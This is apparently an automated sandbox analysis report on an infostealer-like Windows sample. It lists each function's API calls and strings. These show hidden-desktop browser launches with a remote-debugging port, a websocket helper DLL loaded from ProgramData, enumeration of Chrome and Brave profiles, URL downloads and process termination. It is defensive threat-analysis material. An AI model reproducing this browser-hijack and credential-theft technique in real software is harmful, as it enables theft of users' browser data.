Instruction ID: ab2078f5f47aa6eaeaf83cafc0758b5ab509dada1718e255d3e4d65f54e1cbb6
Opcode Fuzzy Hash: 5eea1aac99bf7e535a43d37b45fc3319ad1af7de06c44669e1522cdce20b9fba
Instruction Fuzzy Hash: BA413F79740624ABD7109FE5FC4DADCBF70AB4C701BA08062F90A99190C7F993859B7D

Function 0040BE40 Relevance: 63.7, APIs: 29, Strings: 7, Instructions: 727
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2F,00000000,?,?,?,00421450,00420B2E), ref: 0040BEC5
StrCmpCA.SHLWAPI(?,00421454), ref: 0040BF33
StrCmpCA.SHLWAPI(?,00421458), ref: 0040BF49
FindNextFileA.KERNEL32(000000FF,?), ref: 0040C8A9
FindClose.KERNEL32(000000FF), ref: 0040C8BB

Strings

--remote-debugging-port=9229 --profile-directory=", xrefs: 0040C495
Brave, xrefs: 0040C0E8
\Brave\Preferences, xrefs: 0040C1C1
Preferences, xrefs: 0040C104
Google Chrome, xrefs: 0040C6F8
--remote-debugging-port=9229 --profile-directory=", xrefs: 0040C534
--remote-debugging-port=9229 --profile-directory=", xrefs: 0040C3B2

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-1869280968
Opcode ID: 20d43af49ac8ce4d1e33b895b6731e7b2aad3236febdf6d8fc1bb9c658583540
Instruction ID: 94c18d54b217f3a33de79012ae3cbc39d408ee074d55138b38aa149d1ce8c153
Opcode Fuzzy Hash: 20d43af49ac8ce4d1e33b895b6731e7b2aad3236febdf6d8fc1bb9c658583540
Instruction Fuzzy Hash: 5C52A871A011049BCB14FB61DC96EEE733DAF54304F4045AEF50A66091EF386B98CFAA

Function 00414B60 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00414B7C
FindFirstFileA.KERNEL32(?,?), ref: 00414B93
StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
FindClose.KERNEL32(000000FF), ref: 00414DE2

Strings

%s\%s, xrefs: 00414BF4
-SA, xrefs: 00414DE8, 00414DAB, 00414D54, 00414BA8, 00414D57, 00414DAE
%s\%s, xrefs: 00414C4B
%s\*, xrefs: 00414B70

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*$-SA
API String ID: 180737720-309722913
Opcode ID: 9989705b10511079cbc1c9db8c5933311762cc962bdf51fd0f19e0690b846a51
Instruction ID: 6eceda3e2f2aeeb228f448c6629b31eb3c314648a2220d8d34325ba683034fba
Opcode Fuzzy Hash: 9989705b10511079cbc1c9db8c5933311762cc962bdf51fd0f19e0690b846a51
Instruction Fuzzy Hash: F2617771904218ABCB20EBA0ED45FEA737DBF48701F40458EF60996191FB74AB84CF95

Function 00409E30 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 157
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00409E47

Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,00976A20,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16

wsprintfA.USER32 ref: 00409E7F
OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00409EA3
CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00409ECC
memset.MSVCRT ref: 00409EED
lstrcatA.KERNEL32(00000000,?), ref: 00409F03
lstrcatA.KERNEL32(00000000,?), ref: 00409F17
lstrcatA.KERNEL32(00000000,004212D8), ref: 00409F29
memset.MSVCRT ref: 00409F3D
lstrcpy.KERNEL32(?,00000000), ref: 00409F7C
memset.MSVCRT ref: 00409F9C
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,00000000), ref: 0040A004
Sleep.KERNEL32(00001388), ref: 0040A013
CloseDesktop.USER32(00000000), ref: 0040A060

Strings

D, xrefs: 00409FA4

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: memset$Desktoplstrcat$Create$CloseOpenProcessSleepSystemTimelstrcpywsprintf
String ID: D
API String ID: 1347862506-2746444292
Opcode ID: a3c0d74616739dfe6e649dee9790039705e6b773d6ae131a4489b076431e44aa
Instruction ID: 9351db1e319cd03a78e50f41365f33c4a7b54471eb3ec1f6bde0cae738676000
Opcode Fuzzy Hash: a3c0d74616739dfe6e649dee9790039705e6b773d6ae131a4489b076431e44aa
Instruction Fuzzy Hash: B551B3B1D04318ABDB20DF60DC4AFDA7778AB48704F004599F60DAA2D1EB75AB84CF55

Function 004140F0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00414113
FindFirstFileA.KERNEL32(?,?), ref: 0041412A
StrCmpCA.SHLWAPI(?,00420F94), ref: 00414158
StrCmpCA.SHLWAPI(?,00420F98), ref: 0041416E
FindNextFileA.KERNEL32(000000FF,?), ref: 004142BC
FindClose.KERNEL32(000000FF), ref: 004142D1

Strings

%s\%s, xrefs: 00414107

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 9d44ee2d1d3302ed3f560bb1c24b0dbad1817cb41e0c40033f90fa3194e93cf6
Instruction ID: fabef74ebea8da44b501a85f582971371f90885c40acf49b74ac124388ccf1e1
Opcode Fuzzy Hash: 9d44ee2d1d3302ed3f560bb1c24b0dbad1817cb41e0c40033f90fa3194e93cf6
Instruction Fuzzy Hash: 745179B1904118ABCB24EBB0DD45EEA737DBB58304F4045DEB60996090EB74ABC5CF59

Function 00405000 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 82networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040501A
RtlAllocateHeap.NTDLL(00000000), ref: 00405021
InternetOpenA.WININET(00420DE3,00000000,00000000,00000000,00000000), ref: 0040503A
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405061
InternetReadFile.WININET(+aA,?,00000400,00000000), ref: 00405091
memcpy.MSVCRT(00000000,?,00000001), ref: 004050DA
InternetCloseHandle.WININET(+aA), ref: 00405109
InternetCloseHandle.WININET(?), ref: 00405116

Strings

+aA, xrefs: 00405105, 0040508D, 00405090, 00405108
+aA, xrefs: 00405051, 00405134

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
String ID: +aA$+aA
API String ID: 1008454911-2425922966
Opcode ID: 2054dbe4896dccbf1b25db0542e201d3eadf361b24acad6cfbdf1ee3c924dd12
Instruction ID: fde31ff110f26a7c533ed41685ed538a2d60c52cc522202a3453e975d8f44226
Opcode Fuzzy Hash: 2054dbe4896dccbf1b25db0542e201d3eadf361b24acad6cfbdf1ee3c924dd12
Instruction Fuzzy Hash: 193136B4E01218ABDB20CF54DC85BDDB7B5EB48304F1081EAFA09A7281D7746AC18F9D

Function 00401710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042523C,?,00401F6C,?,004252E4,?,?,00000000,?,00000000), ref: 00401963
StrCmpCA.SHLWAPI(?,0042538C), ref: 004019B3
StrCmpCA.SHLWAPI(?,00425434), ref: 004019C9
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D80
DeleteFileA.KERNEL32(00000000), ref: 00401E0A
FindNextFileA.KERNEL32(000000FF,?), ref: 00401E60
FindClose.KERNEL32(000000FF), ref: 00401E72

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Strings

\*.*, xrefs: 00401831

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: fb5e4da87126f439d0ba2410e22736a4b7d08ec171709da3f27cccb680b52614
Instruction ID: df326988fd69e0da1611ef2be43153edb0d5c51867ec3eea105421fd5dfb977f
Opcode Fuzzy Hash: fb5e4da87126f439d0ba2410e22736a4b7d08ec171709da3f27cccb680b52614
Instruction Fuzzy Hash: F5125171A111189BCB15FB61DCA6EEE7339AF14314F4045EEB10662091EF386BD8CFA9

Function 0040A090 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll,?,004108E4), ref: 0040A098
GetProcAddress.KERNEL32(6CFA0000,connect_to_websocket), ref: 0040A0BE
GetProcAddress.KERNEL32(6CFA0000,free_result), ref: 0040A0D5
FreeLibrary.KERNEL32(6CFA0000,?,004108E4), ref: 0040A0F9

Strings

free_result, xrefs: 0040A0C9
C:\ProgramData\chrome.dll, xrefs: 0040A093
connect_to_websocket, xrefs: 0040A0B3

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: AddressLibraryProc$FreeLoad
String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
API String ID: 2256533930-1545816527
Opcode ID: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
Instruction ID: 41317d004e32df3368e0b40b2df30f060e9b3f1c7a199a11b2b6647de007d5a9
Opcode Fuzzy Hash: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
Instruction Fuzzy Hash: 57F01DB4E0E324EFD7009B60ED48B563BA6E318341F506437F505AB2E0E3B85494CB6B

Function 004198E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00419905
Process32First.KERNEL32(00409FDE,00000128), ref: 00419919
Process32Next.KERNEL32(00409FDE,00000128), ref: 0041992E
StrCmpCA.SHLWAPI(?,00409FDE), ref: 00419943
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0041995C
TerminateProcess.KERNEL32(00000000,00000000), ref: 0041997A
CloseHandle.KERNEL32(00000000), ref: 00419987
CloseHandle.KERNEL32(00409FDE), ref: 00419993

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 2696918072-0
Opcode ID: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
Instruction ID: 9e175830caf9148bd7a219e001ec971bef60eefc02138b6d75eb658f8e5d4480
Opcode Fuzzy Hash: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
Instruction Fuzzy Hash: 94112EB5E15218ABCB24DFA0DC48BDEB7B9BB48700F00558DF509A6240EB749B84CF91

Function 0040E530 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D79), ref: 0040E5A2
StrCmpCA.SHLWAPI(?,004215F0), ref: 0040E5F2
StrCmpCA.SHLWAPI(?,004215F4), ref: 0040E608
FindNextFileA.KERNEL32(000000FF,?), ref: 0040ECDF

Strings

@, xrefs: 0040ECF5, 0040E6EB, 0040E81C, 0040E95B, 0040E5B9, 0040E6EE, 0040E81F, 0040E95E
\*.*, xrefs: 0040E54D

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*$@
API String ID: 433455689-2355794846
Opcode ID: f47e142a0e0eda43e20b824a082bfd3b09faa894479a78cb414dd1fa94ebedbf
Instruction ID: 078a0cb4b8b1302ba7a9d85fb6124db0b21cd0ebb254cebb7c4a92464ee22dab
Opcode Fuzzy Hash: f47e142a0e0eda43e20b824a082bfd3b09faa894479a78cb414dd1fa94ebedbf
Instruction Fuzzy Hash: A6128431A111185BCB14FB61DCA6EED7339AF54314F4045EFB10A62095EF386F98CB9A

Function 00417D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

GetKeyboardLayoutList.USER32(00000000,00000000,004205B7), ref: 00417D71
LocalAlloc.KERNEL32(00000040,?), ref: 00417D89
GetKeyboardLayoutList.USER32(?,00000000), ref: 00417D9D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417DF2
LocalFree.KERNEL32(00000000), ref: 00417EB2

Strings

/ , xrefs: 00417E0F

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
